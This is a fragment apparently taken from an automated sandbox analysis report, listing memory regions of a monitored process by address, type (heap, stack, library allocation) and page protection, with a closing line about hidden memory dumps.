page execute and read and write
1DEE000
stack
page read and write
330000
heap
page read and write
BD0000
trusted library allocation
page read and write
1E7D000
heap
page read and write
2DFD000
unkown
page read and write
40E000
heap
page read and write
2BBE000
stack
page read and write
49F000
heap
page read and write
280000
trusted library allocation
page read and write
DE0000
trusted library allocation
page read and write
1BA000
trusted library allocation
page read and write
A7F000
stack
page read and write
FA0000
trusted library allocation
page read and write
399000
heap
page read and write
3A12000
heap
page read and write
A3D0000
trusted library allocation
page read and write
A390000
heap
page read and write
3020000
heap
page read and write
E8E000
stack
page read and write
25FE000
stack
page read and write
5FD0000
heap
page read and write
D4F000
stack
page read and write
2841000
trusted library allocation
page read and write
209000
heap
page read and write
370000
heap
page read and write
544000
heap
page read and write
1D55000
heap
page read and write
248F000
stack
page read and write
5B3000
heap
page read and write
4230000
heap
page read and write
406000
heap
page read and write
248000
trusted library allocation
page read and write
215000
trusted library allocation
page execute and read and write
4F2E000
stack
page read and write
2BBD000
trusted library allocation
page read and write
288000
heap
page read and write
1EEF000
stack
page read and write
D60000
trusted library allocation
page read and write
D80000
trusted library allocation
page read and write
3570000
heap
page read and write
1E82000
heap
page read and write
A440000
trusted library allocation
page read and write
6E7000
heap
page read and write
1FA000
trusted library allocation
page execute and read and write
3E2000
heap
page read and write
637000
heap
page read and write
4F2D000
stack
page read and write
4F6B000
heap
page read and write
1F7000
trusted library allocation
page execute and read and write
BC0000
trusted library allocation
page read and write
3821000
trusted library allocation
page read and write
5D8000
heap
page read and write
20AE000
stack
page read and write
E00000
trusted library allocation
page read and write
3EC7000
heap
page read and write
3EDF000
heap
page read and write
28C000
heap
page read and write
36A000
heap
page read and write
45B0000
trusted library allocation
page read and write
4ACE000
stack
page read and write
3EB2000
heap
page read and write
2864000
trusted library allocation
page read and write
BDF000
heap
page read and write
2813000
trusted library allocation
page read and write
18A000
stack
page read and write
B9B000
heap
page read and write
2821000
trusted library allocation
page read and write
1F0E000
stack
page read and write
5DCD000
stack
page read and write
60E000
heap
page read and write
57E000
stack
page read and write
40B000
heap
page read and write
2BCE000
heap
page read and write
7B7000
heap
page read and write
180000
heap
page read and write
368000
heap
page read and write
48AF000
heap
page read and write
DD0000
trusted library allocation
page read and write
9DED000
stack
page read and write
395F000
stack
page read and write
2B20000
heap
page read and write
79A000
heap
page read and write
368000
heap
page read and write
1EF0000
heap
page read and write
28AA000
trusted library allocation
page read and write
4B9E000
stack
page read and write
3EB2000
heap
page read and write
2A2F000
stack
page read and write
6CB1000
trusted library allocation
page read and write
C2B1000
trusted library allocation
page read and write
ECC000
stack
page read and write
B65000
heap
page read and write
1CF000
stack
page read and write
7CB1000
trusted library allocation
page read and write
212000
trusted library allocation
page read and write
3A0000
heap
page read and write
B9B000
heap
page read and write
351F000
stack
page read and write
3EB3000
heap
page read and write
10001000
direct allocation
page execute and read and write
A0AF000
stack
page read and write
410000
heap
page read and write
2883000
trusted library allocation
page read and write
5CE000
heap
page read and write
D70000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
2B01000
trusted library allocation
page read and write
1E60000
heap
page read and write
2B21000
trusted library allocation
page read and write
379000
trusted library allocation
page read and write
42F000
heap
page read and write
1EDE000
stack
page read and write
3E51000
heap
page read and write
A30000
heap
page read and write
48AC000
heap
page read and write
60E000
heap
page read and write
B7C000
heap
page read and write
22DD000
stack
page read and write
490000
heap
page read and write
2C70000
heap
page read and write
99B0000
heap
page read and write
4F30000
heap
page read and write
9E0000
trusted library allocation
page read and write
720000
heap
page read and write
CD0000
heap
page execute and read and write
2BBF000
trusted library allocation
page read and write
42CF000
stack
page read and write
50A000
heap
page read and write
3A12000
heap
page read and write
231F000
stack
page read and write
5F3E000
stack
page read and write
2D9E000
stack
page read and write
3BE1000
heap
page read and write
5160000
heap
page read and write
13D000
trusted library allocation
page execute and read and write
5234000
heap
page read and write
B9B000
heap
page read and write
E60000
trusted library allocation
page read and write
154000
trusted library allocation
page read and write
2819000
trusted library allocation
page read and write
15D000
trusted library allocation
page execute and read and write
435000
heap
page read and write
4F4E000
stack
page read and write
260000
trusted library allocation
page execute and read and write
3989000
trusted library allocation
page read and write
3EDD000
heap
page read and write
348C000
trusted library allocation
page read and write
FCE000
stack
page read and write
4C8E000
stack
page read and write
5C7E000
stack
page read and write
32A000
heap
page read and write
EB0000
trusted library allocation
page read and write
1F90000
heap
page read and write
1EA3000
heap
page read and write
299000
heap
page read and write
2E0000
heap
page read and write
7A9000
heap
page read and write
170000
heap
page read and write
390000
heap
page read and write
4E8F000
stack
page read and write
5E5E000
stack
page read and write
4B5F000
stack
page read and write
47AC000
heap
page read and write
3EF2000
heap
page read and write
27000
heap
page read and write
820000
trusted library allocation
page read and write
2D0000
heap
page read and write
4CF000
heap
page read and write
4DFE000
stack
page read and write
2821000
trusted library allocation
page read and write
99AE000
stack
page read and write
A50000
heap
page read and write
2CCC000
heap
page read and write
255F000
stack
page read and write
38B000
heap
page read and write
3FF0000
heap
page read and write
4E1D000
heap
page read and write
5DAE000
stack
page read and write
B69000
heap
page read and write
57F000
heap
page read and write
12FF000
stack
page read and write
10000
heap
page read and write
B69000
heap
page read and write
960000
heap
page read and write
There are 953 hidden memdumps, click here to show them.